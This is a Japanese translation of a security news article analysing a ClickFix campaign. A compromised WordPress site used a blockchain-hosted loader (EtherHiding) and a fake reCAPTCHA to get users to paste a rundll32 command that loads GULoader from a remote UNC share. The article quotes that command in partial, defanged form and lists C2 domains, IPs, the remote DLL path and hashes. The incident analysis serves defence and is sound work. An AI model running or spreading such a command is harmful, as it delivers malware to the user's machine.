2026年4月、インシデント対応チームは、侵害されたWordPressサイトを踏み台に、EtherHiding → ClickFix → UNCチェーンを経由してGULoaderを配布する高度な侵入活動を追跡しました。
この実環境で観測されたClickFix攻撃では、ANY.RUNサンドボックスでの検体爆発とライブEDRテレメトリから得られた証拠が一致し、WordPressのmu-pluginバックドアからrundll32.exeの実行ブロックに至るまでのWordPressを起点とした完全な攻撃経路が明らかになりました。最終段階では、リモートUNC共有からGULoaderをロードしようとする試みが検知されています。
Elastic Defendの振る舞い検知ルールは300ミリ秒以内にプロセスを強制終了し、GULoaderの初期化を阻止しました。
最初の検知は、社内ワークステーション上での異常なrundll32.exeの起動によって始まりました。実行文字列にはUNCパスと序数ベースのエクスポート呼び出しが含まれており、これはLOLBin手法の典型例であり、レピュテーションベースおよび拡張子ベースのフィルターを回避するために設計されています(例:rundll32.exe \autum-path.vo8xalon[.]in[.]net… .google,#1)。
エンドポイントテレメトリは、explorer.exeから「ファイル名を指定して実行」ダイアログ、NtCreateUserProcessに至るまでの完全なプロセス生成コールスタックを記録しており、この一連の動作がエクスプロイトやブラウザの子プロセス起動ではなく、ユーザー操作(Win+R、貼り付け、Enterキー)によって実行されたことを証明しています。
コールスタックには、CheckSmartScreenWithAltFileを介したSmartScreen評価も記録されていました。UNC経由でロードされるコンテンツにはMark-of-the-Webが付与されないため、署名済みのMicrosoftバイナリはそのまま実行が許可されています。
Sicuranextの報告によると、今回のClickFix侵入はサンドボックスとエンドポイントテレメトリの両方から観測されており、侵害されたWordPressサイトからGULoader実行のブロックに至るまでの完全な攻撃経路が明らかになっています。
フォレンジック調査による再構築の結果、この実行はEtherHiding v3スタイルのmu-pluginバックドアが埋め込まれた、欧州の正規中小企業WordPressサイトに紐付けられることが判明しました。
WordPressサイトを悪用したGULoader配布
当該mu-pluginはサイトの通常機能をすべて維持しながら、ページフッターに2つのインラインスクリプトブロックを追加していました。一つはTraffic Direction Systemにデータを送信する訪問者追跡ビーコン、もう一つはBase64/XORデータをデコードしてBNBスマートチェーン(BSC)テストネット上のスマートコントラクトに接続する難読化されたペイロードローダーです。
このEtherHidingアプローチでは、ペイロードのJavaScript、サンドボックス検出ロジック、おとりHTML、および重複排除の状態情報をスマートコントラクトのデータとして保存し、公開されたeth_call RPCを通じて取得できる仕組みになっています。
観測されたネットワーク活動には、bsc-testnet[.]drpc[.]orgへのPOSTリクエストと、data-seed-prebsc-1-s1[.]bnbchain[.]orgへのフォールバックが含まれていました。これらのエンドポイントはサンドボックスとエンドポイントのDNSログの両方で記録されており、サンドボックス上のSuricataはEtherHidingトラフィックとしてフラグを立てています。
ブロックチェーンからペイロードを取得すると、注入されたスクリプトはClickFix偽reCAPTCHAオーバーレイを表示し、ユーザーにWin+R、Ctrl+V、Enterの操作を促しました。この時点で、navigator.clipboard.writeTextによってコマンドはすでにクリップボードに書き込まれていました。
被害者へのヒアリングで、指示に従って操作を行ったことが確認されました。これにより、サンドボックス単独の分析では推測にとどまっていた帰属の連鎖が証明されました。すなわち、この攻撃は自動化されたエクスプロイトではなく、ソーシャルエンジニアリングによるものであることが確定したのです。
この攻撃で使用されたTraffic Direction Systemはプラットフォームを識別しており、悪意のあるオーバーレイはデスクトップのWindowsブラウザにのみ表示されました。モバイル端末やクローラーには無害なコンテンツが表示されたため、サイト所有者や監視担当者が侵害を検知できなかった理由が説明されます。
今回の攻撃では、インメモリシェルコードダウンローダーであるGULoaderのロードが試みられました。GULoaderは複数のインフォスティーラーおよびRATファミリーと関連づけられています。
Cluster25と公開テレメトリは、autum-path[.]vo8xalon[.]in[.]netのインフラをGULoader活動に結びつけています。このドメインはCloudflareのIPアドレスに解決されており、実際の配信元インフラが隠蔽されていました。
特筆すべき点として、Elastic Defendの振る舞い検知ルール「RunDLL32 with Unusual Arguments」がUNCパスと序数の組み合わせパターンを検知し、GULoaderが初期化を完了する前にrundll32を強制終了しました。
プロセス強制終了後の分析では、子プロセスの生成、ネットワーク接続、認証情報窃取の痕跡、メモリ異常のいずれも確認されませんでした。
サンドボックスとエンドポイントの両視点を組み合わせた今回の分析から、3つの防御上の教訓が導き出されます。(1)WordPressサイトにとって、サーバー側のファイル整合性チェックとmu-pluginの監査は不可欠です。(2)EtherHidingに代表されるブロックチェーンへのペイロード格納は、テイクダウンを困難にし、マルバタイジングキャンペーンの耐久性を高めます。(3)LOLBinの悪用や不審な引数パターンを標的にした堅牢な振る舞い検知EDRルールは、レピュテーションチェックやSmartScreenが実行を許可した場合でも、高度なソーシャルエンジニアリングの連鎖を封じ込める効果があります。
侵害の痕跡(IoC)
| 種別 | インジケーター | コンテキスト |
|---|---|---|
| domain | [REDACTED] | 侵害されたWordPressサイト(被害者) |
| ipv4-addr | [REDACTED] | サイトホスティング(Hetzner、ドイツ) |
| domain | autum-path[.]vo8xalon[.]in[.]net | GULoader C2 |
| ipv4-addr | 188[.]114[.]96[.]7 | C2解決先(Cloudflare) |
| ipv4-addr | 188[.]114[.]97[.]7 | C2解決先(Cloudflare) |
| domain | bsc-testnet[.]drpc[.]org | EtherHiding RPCエンドポイント |
| domain | data-seed-prebsc-1-s1[.]bnbchain[.]org | BSCテストネットフォールバックRPC |
| file-path | \autum-path[.]vo8xalon[.]in[.]net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google | リモートDLLパス |
| SHA-256 | 172a25a9ed8b798d8baeec29424b46627b5b39723b37c787f928d3700509001e | Webコンテンツ(ANY.RUN) |
| MD5 | 236e1bef618edfe7f7c29ee2b4cba620 |
注意: IPアドレスおよびドメインは、誤った名前解決やハイパーリンクへの変換を防ぐため、意図的にデファング処理(例:[.])されています。MISP、VirusTotal、SIEMなどの管理された脅威インテリジェンスプラットフォーム上でのみ、元の形式に戻して使用してください。
翻訳元: https://gbhackers.com/wordpress-sites-to-deliver-guloader/
